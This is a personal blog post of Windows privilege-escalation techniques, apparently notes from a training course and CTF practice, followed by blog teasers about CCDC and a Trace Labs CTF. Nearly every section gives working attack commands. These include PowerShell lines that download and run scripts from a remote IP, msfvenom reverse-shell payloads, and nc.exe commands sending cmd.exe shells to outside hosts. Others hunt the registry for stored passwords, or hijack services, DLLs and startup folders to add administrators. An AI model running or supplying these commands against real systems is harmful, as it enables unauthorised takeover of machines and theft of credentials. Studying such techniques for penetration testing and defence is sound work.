Windows Privilege Escalation Jutsus

-

Introduction

This is a list of Windows Privilege Escalation jutsus I am collecting. Most originated from TCM's Windows Priv Esc course.

1. winPEAS.exe

Link: winPEAS github

2. PowerUp.ps1

  1. echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/PowerUp.ps1') | powershell -noprofile -
  2. ^ at the end of PowerUp.ps1 add the Invoke-AllChecks

3. Sherlock.ps1

  1. echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/Sherlock.ps1') | powershell -noprofile -
  2. ^ at the end of Sherlock.ps1 add Find-AllVulns
  3. Note: It takes awhile.

3.5. windows_local_suggester.py

  1. https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  2. python windows-exploit-suggester.py --update
  3. python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

3.6 Looting for Passwords

Detection

  1. PayLoadAllTheThings Passwords EoF
  2. reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
  3. reg query HKLM /f password /t REG_SZ /s
  4. reg query HKCU /f password /t REG_SZ /s
  5. Check unattend.xml files
  6. See if SAM or SYSTEM file exists. winPEAS.

4.0 Kernel Exploits

Seclist Windows Kernel Exploits https://github.com/SecWiki/windows-kernel-exploits

4. Chimichurri MS10-059

Link: chim.exe github

4.1 ClientCopyImage Win32k MS15-051

Link: Only use ZIP: ms15-051x64.exe

4.2 Windows 8.1 x64 RGNOBJ Integer Overflow MS16-098

Link: Binary up above.

4.3 Churrasco.exe WebDav

Link: churrasco.exe

Link: SHELL

7. Hot Potato

Detection

Look for SEAssignPrimaryToken or SEImpersonateToken. I have also seen it work without these displaying after whoami /priv. Try this if your running out of ideas.

potato.exe Instructions

  1. msfvenom -p windows/shell_reverse_tcp LHOST=10.2.43.23 LPORT=4444 -f exe > shell.exe
  2. Potato.exe is here: Potato
  3. potato.exe -ip 10.10.80.141 -cmd "C:\Users\user\Desktop\shell.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
  4. The -ip should be the victims IP. Not yours.

Tater.ps1 Instructions

  1. Link to Tater Powershell: https://github.com/Kevin-Robertson/Tater. Github good too.
  2. The command up above is valid.
  3. powershell -ep bypass
  4. . .\Tater.ps1
  5. Invoke-Tater -Trigger 1 -Command "C:\Users\user\Desktop\nc.exe 10.2.43.23 4444 -e cmd.exe"

PrintSpoofer.exe

  1. Download PrintSpoofer here: Print Potato
  2. PrintSpoofer.exe -i -c "C:\Users\user\Desktop\shell.exe"

JuicyPotato.exe

  1. C:\Users\Administrator\.jenkins\nc.exe 10.10.14.26 53 -e C:\Windows\System32\cmd.exe --- make a bat file.
  2. C:\Windows\>JuicyPotato.exe -l 1337 -p C:\Users\Administrator\.jenkins\go.bat -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}

RoguePotato.exe

Hasn't worked for me. But if desperate: Rogue Potato

8. RunAs

Detection and Exploitation

cmdkey Defintion: Creates, lists, and deletes stored user names and passwords or credentials.

  1. cmdkey /list
  2. C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"

--- OR ---

  1. cmdkey /list
  2. msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.18 lport=4444 exitfunc=thread -f exe -o shell.exe
  3. C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "shell.exe"

9. Always Install Elevated

Detection - 2 Options

Option 1 - PowerUp

  1. powershell -ep bypass
  2. . .\PowerUp.ps1
  3. Invoke-AllChecks
Something like this should appear:

Option 2 - Reg Queries

  1. Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
  2. From the output, notice that “AlwaysInstallElevated” value is 1.
  3. In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  4. From the output, notice that “AlwaysInstallElevated” value is 1.

Exploitation

  1. Run the Write-UserAddMSI in PowerUp
  2. msfvenom -p windows/shell_reverse_tcp lhost=10.2.43.23 lport=4444 exitfunc=thread -f msi -o shell.msi

10. Regsvc ACL

Detection

  1. powershell -ep bypass
  2. Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
  3. See if the output suggests that user belong to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.

Exploitation

  1. sudo apt install gcc-mingw-w64
  2. windows_service.c <- Edit file
  3. x86_64-w64-mingw32-gcc windows_service.c -o x.exe
  4. Place x.exe in C:\Temp
  5. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
  6. In the command prompt type: sc start regsvc
  7. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

11. Executable Files

Detection

  1. powershell -ep bypass
  2. . .\PowerUp.ps1
  3. OR accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
  4. Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file

Exploitation

  1. x.exe can be a msfvenom generated reverse shell or the x.exe from windows_service.c
  2. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
  3. In command prompt type: sc start filepermsvc

12. Escalation via Binary Paths (binPath)

  1. powershell -ep bypass
  2. . .\PowerUp.ps1
  3. Invoke-AllChecks
  4. accesschk64.exe -uwcv Everyone * <- checks entire machine
  5. accesschk64.exe -wuvc daclsvc
  6. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

Exploitation

  1. sc qc daclsvc <-- see the current binary path
  2. sc config daclsvc binpath= "net localgroup administrators user /add"
  3. sc start daclsvc
  4. Note: expect an error. Still should work.
  5. OR sc config UsoSvc binpath="C:\Reports\nc.exe 10.10.14.26 5555 -e cmd.exe"

13. Unquoted Service Paths

  1. powershell -ep bypass
  2. . .\PowerUp.ps1
  3. Invoke-AllChecks

Exploitation

  1. Rules: Must be unquoted binary path AND have a space in the name.
  2. msfvenom -p windows/shell_reverse_tcp LHOST=10.2.43.23 LPORT=4444 -f exe > common.exe
  3. Place common.exe in the C:\Program Files\Unquoted Path Service\Common Files folder.
  4. sc start unquotedsvc

14. CVE-2019-1388 (Internet Certificate)

https://www.youtube.com/watch?v=3BQKpPNlTSo
https://github.com/jas502n/CVE-2019-1388

15. DLL Hijacking

Detection

  1. SysInternals -> Process Monitor -> Procmon (Admin only)
  2. Filter by RESULT is NAME NOT FOUND
  3. Filter by PATH ends with .dll
  4. Note: Might get info on this in winPEAS or PowerUp. Can't use procmon obviously.

Exploitation

  1. Get windows_dll.c here: windows_dll.c github.
  2. x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
  3. sc stop dllsvc
  4. sc start dllsvc

16. Scheduled Tasks

Detection

  1. Note: Very hard to find out. You'll have to discover a script.
  2. schtasks /query /fo LIST /v
  3. accesschk64.exe -quv user CleanUp.ps1

49. WSL Windows Subsystem for Linux

Detection

  1. where /R c:\windows bash.exe
  2. where /R c:\windows wsl.exe
  3. Get into bash and do a history. Look around
  4. PayLoadAllTheThings WSL

50. Startup Application

Detection

  1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

Exploitation

  1. msfvenom -p windows/shell_reverse_tcp LHOST=10.2.43.23 LPORT=4444 -f exe > x.exe
  2. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
  3. (mv x.exe C:\.... ) ^ Logoff.
  4. Login with the administrator account credentials.


I don't want to be backed into a corner so I have many jutsus :). The numbers relate to significance. Higher Number = I use it more often. Some techniques are out of order tho.

Comments

Post a Comment

Popular posts from this blog

Palo Alto for GNS3 CCDC Tutorial

-
Image
Opening Hello fellow CCDC Competitors! Struggling to get a Palo-Alto VM? I know how you can get one! Email me at ASzampiasSWD@gmail.com. I'll tell you the steps to get a PA-VM for GNS3. Why am I giving this info to you? Wouldn't it make sense to hog the info to myself? Wouldn't my team have an advantage? There are have and have not universities when it comes to PaloAltos. I fell into the "have not" group. Our college didn't have access to PA-VMs and still doesn't. Even if PA Cybersecurity Academy is free, there is too much red tape. I can't change the outcome. I can only come up with this one solution. Another reason is Tri-C is a tryout team. I think its pretty unfair as a potential Firewall Admin I'm the only one with access. No one can challenge me unless they spend 2K for a PA-VM. It becomes a rich-person only position. I have a leftover PA-VM from 2018 I promised not to share. I couldn't share that with my challengers. But I f...
Read more

Release of CCDC ISE Manager Website

-
Image
I worked on the ISE (Inject Scoring Engine) website from 2017 to 2019. I made it to encourage teams to follow a merit-based, open admission tryout format. I identified a problem and made a solution for it. Problem: Call for Merit and Fairness on CCDC Rosters Solution: Github Project Solution: How to run a Team After Tri-C was finished with 2017 Midwest Wildcards I used httrack to grap the Inject PDF files. I didn't grap just the files, but the entire front-end code of the website. If you created the HTML and CSS of the original ISE website, tell me your name so I can give you credit! My goal was to make an almost-replica of the original. The database and back-end code is all guessing by me. I used a LAMP stack because I believe the original website is built on that. I did some fingerprinting and found the "ccdcadmin1" website was hosted on Apache and PHP. If you notice any bugs or errors let me know. If you want a feature added let me know. I will be working ...
Read more

Trace Labs Global Missing Persons CTF V

-
Image
Trace Labs CTF V TraceLabs hosted the Global Missing Persons CTF V event on July 11, 2020. My team //synergy got 64th place out of 190 teams. Introduction This was my first Trace Labs CTF. I captained a team. The good thing about being a captain is you can control who is on the team. My rules were: Must have sock puppet accounts ready. Must have a VPN. Writing out this is a competitive team where we work the entire 6 hours. I was worried about a future team member spamming submissions and disqualifying the team. I thought my requirements would eliminate people who weren't serious. The team hit 4 members Friday evening pretty quickly. Notes My laptop was too slow for this event. My virtual machine froze and I had to restart. Restarting means I have to login to my accounts again. I'll use my desktop next time. The team used Slack and Trello. Our strategy was to research a person and rotate every hour. This strategy broke after 1 rotation. Some missin...
Read more